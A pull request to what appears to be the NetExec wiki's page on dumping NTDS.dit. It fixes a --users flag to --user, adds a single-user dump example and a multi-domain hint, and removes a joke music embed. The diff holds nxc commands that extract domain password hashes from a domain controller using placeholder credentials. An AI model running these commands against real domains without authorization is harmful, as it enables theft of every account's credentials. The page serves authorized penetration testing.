### PR TITLE
fix incorrect --users flag to --user

### DIFF
--- a/smb-protocol/obtaining-credentials/dump-ntds.dit.md
+++ b/smb-protocol/obtaining-credentials/dump-ntds.dit.md
@@ -13,15 +13,26 @@ Requires Domain Admin or Local Admin Priviledges on target Domain Controller
 			vss - Uses the Volume Shadow copy Service  
 ```
 
+### Dump all users from the NTDS.dit
+
 ```bash
 nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds
-nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --users
-nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --users --enabled
+nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --enabled
 nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds vss
 ```
 
 {% hint style="info" %}
 You can also DCSYNC with the computer account of the DC
+{% endhint %}
+
+### Dump a specific user only
+
+```bash
+nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --user Administrator
+```
+
+{% hint style="warning" %}
+In environments with multiple domains (e.g., parent/child), make sure to specify the full NetBIOS format when using --user, such as: **--user NETBIOS/Administrator**. This avoids ambiguity when the same username exists in different domains.
 {% endhint %}
 
 There is also the ntdsutil module that will use ntdsutil to dump NTDS.dit and SYSTEM hive and parse them locally with secretsdump.py&#x20;
@@ -30,6 +41,3 @@ There is also the ntdsutil module that will use ntdsutil to dump NTDS.dit and SY
 nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' -M ntdsutil
 ```
 
-Remember to play this music everytime you got DA
-
-{% embed url="https://www.youtube.com/watch?v=SyjUwhBYa6Q" %}


### PR DESCRIPTION
### 📝 **PR Description**

This PR corrects the documentation for the `--user` flag (previously incorrectly written as `--users`) in the NetExec wiki.

Additionally, it adds a usage note for multi-domain environments:

> In environments with multiple domains (e.g., parent/child), make sure to specify the full NetBIOS format when using `--user`, such as: `--user NETBIOS/Administrator`. This avoids ambiguity when the same username exists in different domains.

